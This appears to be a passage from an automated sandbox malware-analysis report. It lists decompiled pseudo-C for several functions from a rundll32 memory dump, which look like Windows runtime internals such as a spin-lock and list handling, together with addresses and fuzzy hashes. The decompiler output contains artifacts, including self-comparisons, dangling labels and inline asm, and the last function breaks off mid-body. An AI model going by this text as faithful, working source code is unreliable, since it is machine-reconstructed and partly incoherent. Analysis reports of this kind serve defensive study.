                                                                                                                Function 0441EF40 Relevance: .1, Instructions: 147COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E0441EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04409080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d0c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04402D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                                0x0441ef4b
                                                                                                                0x0441ef4d
                                                                                                                0x0441ef57
                                                                                                                0x0441f0bd
                                                                                                                0x0441f0c2
                                                                                                                0x0441f0d2
                                                                                                                0x0441f0d2
                                                                                                                0x0441f0c2
                                                                                                                0x0441ef5d
                                                                                                                0x0441ef5f
                                                                                                                0x0441ef67
                                                                                                                0x0441ef6a
                                                                                                                0x0441ef6d
                                                                                                                0x0441ef74
                                                                                                                0x0441ef7f
                                                                                                                0x0441ef82
                                                                                                                0x0441ef82
                                                                                                                0x0441ef86
                                                                                                                0x0441ef88
                                                                                                                0x0441ef8c
                                                                                                                0x0441ef8f
                                                                                                                0x0441ef8f
                                                                                                                0x0441ef8f
                                                                                                                0x00000000
                                                                                                                0x0441ef91
                                                                                                                0x0441ef93
                                                                                                                0x0441efc4
                                                                                                                0x0441efc4
                                                                                                                0x0441efc4
                                                                                                                0x0441efca
                                                                                                                0x0441efd0
                                                                                                                0x0441f0a6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441f0af
                                                                                                                0x0446bb06
                                                                                                                0x0446bb0a
                                                                                                                0x0441f0b5
                                                                                                                0x0441f0b5
                                                                                                                0x0441f0b5
                                                                                                                0x0441f0b5
                                                                                                                0x00000000
                                                                                                                0x0441efd6
                                                                                                                0x0441efd9
                                                                                                                0x0441f0de
                                                                                                                0x0441f0e2
                                                                                                                0x0441efdf
                                                                                                                0x0441efdf
                                                                                                                0x0441efdf
                                                                                                                0x0441efe5
                                                                                                                0x0446bafc
                                                                                                                0x0446bafc
                                                                                                                0x0441efe5
                                                                                                                0x0441efeb
                                                                                                                0x0441efed
                                                                                                                0x0441f00f
                                                                                                                0x0441f011
                                                                                                                0x0441f01a
                                                                                                                0x0441f01d
                                                                                                                0x0441f021
                                                                                                                0x0441f028
                                                                                                                0x0441f029
                                                                                                                0x0441f029
                                                                                                                0x0441f02c
                                                                                                                0x00000000
                                                                                                                0x0441f02c
                                                                                                                0x0441eff3
                                                                                                                0x0441eff9
                                                                                                                0x0441f0ea
                                                                                                                0x0441f0ed
                                                                                                                0x0441f0ef
                                                                                                                0x00000000
                                                                                                                0x0441f0ef
                                                                                                                0x0441f003
                                                                                                                0x0446bb12
                                                                                                                0x0441f045
                                                                                                                0x0441f049
                                                                                                                0x0441f051
                                                                                                                0x0441f09e
                                                                                                                0x0441f0a0
                                                                                                                0x0441f0a0
                                                                                                                0x0441f09e
                                                                                                                0x0441f053
                                                                                                                0x0441f064
                                                                                                                0x0441f064
                                                                                                                0x0441f06b
                                                                                                                0x0446bb1a
                                                                                                                0x0446bb1a
                                                                                                                0x0441f071
                                                                                                                0x0441f071
                                                                                                                0x0441f07d
                                                                                                                0x0441f082
                                                                                                                0x0441f08f
                                                                                                                0x0441f08f
                                                                                                                0x0441f009
                                                                                                                0x0441f00d
                                                                                                                0x00000000
                                                                                                                0x0441f00d
                                                                                                                0x0441efd0
                                                                                                                0x0441ef97
                                                                                                                0x0441efa5
                                                                                                                0x0441efaa
                                                                                                                0x00000000
                                                                                                                0x0441efac
                                                                                                                0x0441efac
                                                                                                                0x0441efac
                                                                                                                0x00000000
                                                                                                                0x0441efb2
                                                                                                                0x0441f036
                                                                                                                0x0441f03a
                                                                                                                0x0441f040
                                                                                                                0x0441f090
                                                                                                                0x00000000
                                                                                                                0x0441f092
                                                                                                                0x0441f042
                                                                                                                0x00000000
                                                                                                                0x0441f042
                                                                                                                0x0441efb7
                                                                                                                0x0441efb9
                                                                                                                0x0441efbc
                                                                                                                0x0441efb0
                                                                                                                0x0441efb0
                                                                                                                0x00000000
                                                                                                                0x0441efbe
                                                                                                                0x0441efbe
                                                                                                                0x0441efc1
                                                                                                                0x00000000
                                                                                                                0x0441efc1
                                                                                                                0x0441efbc
                                                                                                                0x0441efaa
                                                                                                                0x0441ef91

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                • Instruction ID: 6d93ae348558040f001dd9be18d935e3bbbe7b743d0b5f6d69d351b6650bf18c
                                                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                • Instruction Fuzzy Hash: 2E510434A04249EFDF20CF68C1907AFBBB1AF05314F2881AADD45973A1D375B98AD751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D740D Relevance: .1, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E044D740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0445D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0444F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04424620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04424620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0444F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04424620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                                0x044d740d
                                                                                                                0x044d740d
                                                                                                                0x044d7412
                                                                                                                0x044d7413
                                                                                                                0x044d7416
                                                                                                                0x044d7418
                                                                                                                0x044d741c
                                                                                                                0x044d741f
                                                                                                                0x044d7422
                                                                                                                0x044d7422
                                                                                                                0x044d7428
                                                                                                                0x044d742a
                                                                                                                0x044d742a
                                                                                                                0x044d7451
                                                                                                                0x044d7432
                                                                                                                0x044d744f
                                                                                                                0x044d744f
                                                                                                                0x00000000
                                                                                                                0x044d7434
                                                                                                                0x044d7438
                                                                                                                0x044d7443
                                                                                                                0x044d7517
                                                                                                                0x044d7517
                                                                                                                0x044d751a
                                                                                                                0x044d7535
                                                                                                                0x044d7520
                                                                                                                0x044d7527
                                                                                                                0x044d752c
                                                                                                                0x044d7531
                                                                                                                0x044d7533
                                                                                                                0x00000000
                                                                                                                0x044d7533
                                                                                                                0x00000000
                                                                                                                0x044d7531
                                                                                                                0x044d754b
                                                                                                                0x044d754f
                                                                                                                0x044d755c
                                                                                                                0x044d755c
                                                                                                                0x044d755f
                                                                                                                0x044d7560
                                                                                                                0x044d7561
                                                                                                                0x044d7562
                                                                                                                0x044d7563
                                                                                                                0x044d7568
                                                                                                                0x044d756a
                                                                                                                0x044d756c
                                                                                                                0x044d756d
                                                                                                                0x044d756d
                                                                                                                0x044d756f
                                                                                                                0x044d7572
                                                                                                                0x044d7574
                                                                                                                0x044d7577
                                                                                                                0x044d757c
                                                                                                                0x044d757f
                                                                                                                0x00000000
                                                                                                                0x044d7551
                                                                                                                0x044d7551
                                                                                                                0x044d7551
                                                                                                                0x044d7553
                                                                                                                0x044d7553
                                                                                                                0x044d7449
                                                                                                                0x044d7449
                                                                                                                0x044d744c
                                                                                                                0x044d744c
                                                                                                                0x00000000
                                                                                                                0x044d744c
                                                                                                                0x044d7443
                                                                                                                0x044d750e
                                                                                                                0x044d7514
                                                                                                                0x044d7514
                                                                                                                0x044d7455
                                                                                                                0x044d7469
                                                                                                                0x044d746d
                                                                                                                0x00000000
                                                                                                                0x044d7473
                                                                                                                0x044d7473
                                                                                                                0x044d7476
                                                                                                                0x044d7480
                                                                                                                0x044d7484
                                                                                                                0x044d748e
                                                                                                                0x044d7493
                                                                                                                0x044d7493
                                                                                                                0x044d7496
                                                                                                                0x044d7499
                                                                                                                0x044d74a1
                                                                                                                0x044d74b1
                                                                                                                0x044d74b5
                                                                                                                0x00000000
                                                                                                                0x044d74bb
                                                                                                                0x044d74c1
                                                                                                                0x044d74c1
                                                                                                                0x044d74c4
                                                                                                                0x044d74c5
                                                                                                                0x044d74c6
                                                                                                                0x044d74c7
                                                                                                                0x044d74c8
                                                                                                                0x044d74cd
                                                                                                                0x00000000
                                                                                                                0x044d74d3
                                                                                                                0x044d74d3
                                                                                                                0x044d74d6
                                                                                                                0x044d74d8
                                                                                                                0x044d74db
                                                                                                                0x044d74dd
                                                                                                                0x044d74e0
                                                                                                                0x044d74e7
                                                                                                                0x044d74ee
                                                                                                                0x044d74ee
                                                                                                                0x044d74f4
                                                                                                                0x044d74f9
                                                                                                                0x00000000
                                                                                                                0x044d74fb
                                                                                                                0x044d74fb
                                                                                                                0x044d74fd
                                                                                                                0x044d7500
                                                                                                                0x044d7503
                                                                                                                0x044d7505
                                                                                                                0x044d7505
                                                                                                                0x044d74f9
                                                                                                                0x00000000
                                                                                                                0x044d74cd
                                                                                                                0x044d74b5
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction ID: dc8db9b2b13b8c687bb01cde340b0bd5fd53fa36c0f786c15fceb1a306ba3fe3
                                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction Fuzzy Hash: 0C517A71600606EFDF26CF14C590A96BBB5FF45308F1480AAE9089F252E771FA46CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04432990 Relevance: .1, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E04432990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x44dff00);
				E0445D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x43e1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0444E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x43e1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E044851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x43e166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04432AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04416600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04432C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04432AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04432C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04432ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0445D0D1(_t62);
				goto L28;
			}





















                                                                                                                0x04432990
                                                                                                                0x04432992
                                                                                                                0x04432997
                                                                                                                0x044329a3
                                                                                                                0x044329a6
                                                                                                                0x044329ab
                                                                                                                0x044329ad
                                                                                                                0x044329b2
                                                                                                                0x04475c80
                                                                                                                0x044329b8
                                                                                                                0x044329b8
                                                                                                                0x044329bb
                                                                                                                0x044329c0
                                                                                                                0x044329c5
                                                                                                                0x044329c6
                                                                                                                0x044329c6
                                                                                                                0x044329cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044329cd
                                                                                                                0x044329d0
                                                                                                                0x044329d9
                                                                                                                0x044329db
                                                                                                                0x044329dd
                                                                                                                0x04432a7f
                                                                                                                0x04432a84
                                                                                                                0x04432a87
                                                                                                                0x04432a89
                                                                                                                0x04475ca1
                                                                                                                0x04475ca3
                                                                                                                0x00000000
                                                                                                                0x04432a8f
                                                                                                                0x04432a8f
                                                                                                                0x00000000
                                                                                                                0x04432a8f
                                                                                                                0x00000000
                                                                                                                0x044329e3
                                                                                                                0x044329e3
                                                                                                                0x044329e3
                                                                                                                0x00000000
                                                                                                                0x044329e3
                                                                                                                0x044329dd
                                                                                                                0x00000000
                                                                                                                0x044329db
                                                                                                                0x044329e6
                                                                                                                0x044329e9
                                                                                                                0x044329eb
                                                                                                                0x044329ed
                                                                                                                0x044329f3
                                                                                                                0x044329f5
                                                                                                                0x044329f8
                                                                                                                0x044329fa
                                                                                                                0x04432a97
                                                                                                                0x04432a9a
                                                                                                                0x04432a9d
                                                                                                                0x04432add
                                                                                                                0x00000000
                                                                                                                0x04432a9f
                                                                                                                0x04432aa2
                                                                                                                0x04432aa5
                                                                                                                0x04432aa8
                                                                                                                0x04432aab
                                                                                                                0x04475cab
                                                                                                                0x04475caf
                                                                                                                0x04475cc5
                                                                                                                0x04475cda
                                                                                                                0x04475cdc
                                                                                                                0x04475cdf
                                                                                                                0x04475ce5
                                                                                                                0x00000000
                                                                                                                0x04475ceb
                                                                                                                0x04475ced
                                                                                                                0x04475cee
                                                                                                                0x00000000
                                                                                                                0x04475cee
                                                                                                                0x04475cb1
                                                                                                                0x04475cb4
                                                                                                                0x04475cb9
                                                                                                                0x04475cbb
                                                                                                                0x00000000
                                                                                                                0x04475cbd
                                                                                                                0x04475cbd
                                                                                                                0x00000000
                                                                                                                0x04475cbd
                                                                                                                0x04475cbb
                                                                                                                0x04432ab1
                                                                                                                0x04432ab1
                                                                                                                0x04432ac4
                                                                                                                0x04432ac6
                                                                                                                0x04432ac6
                                                                                                                0x00000000
                                                                                                                0x04432ac6
                                                                                                                0x04432aab
                                                                                                                0x00000000
                                                                                                                0x04432a00
                                                                                                                0x04432a09
                                                                                                                0x04432a0e
                                                                                                                0x04432a21
                                                                                                                0x04432a24
                                                                                                                0x04432a35
                                                                                                                0x04432a3a
                                                                                                                0x04432a3d
                                                                                                                0x04432a42
                                                                                                                0x04432a59
                                                                                                                0x04432a59
                                                                                                                0x04432a5c
                                                                                                                0x04432a5f
                                                                                                                0x04432a5f
                                                                                                                0x044329fa
                                                                                                                0x044329f3
                                                                                                                0x04432a64
                                                                                                                0x04432a64
                                                                                                                0x04432a6b
                                                                                                                0x04432a6b
                                                                                                                0x04432a6d
                                                                                                                0x04432a72
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d43f87b3e81d7f9b5fa5fd4fde93ec5d223a1f619b54c2d0991979627eb2db4f
                                                                                                                • Instruction ID: c797526312bbe4a8ec6e108f4b665e0a69587c194e600725b6577084607a9885
                                                                                                                • Opcode Fuzzy Hash: d43f87b3e81d7f9b5fa5fd4fde93ec5d223a1f619b54c2d0991979627eb2db4f
                                                                                                                • Instruction Fuzzy Hash: CF515B71A00219EFEF25DF55C840ADEBBB5BF4CB14F14809AE801AB361D371A952DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04434D3B Relevance: .1, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E04434D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x44fd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0444FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x44f7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0444B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04424620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0440CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
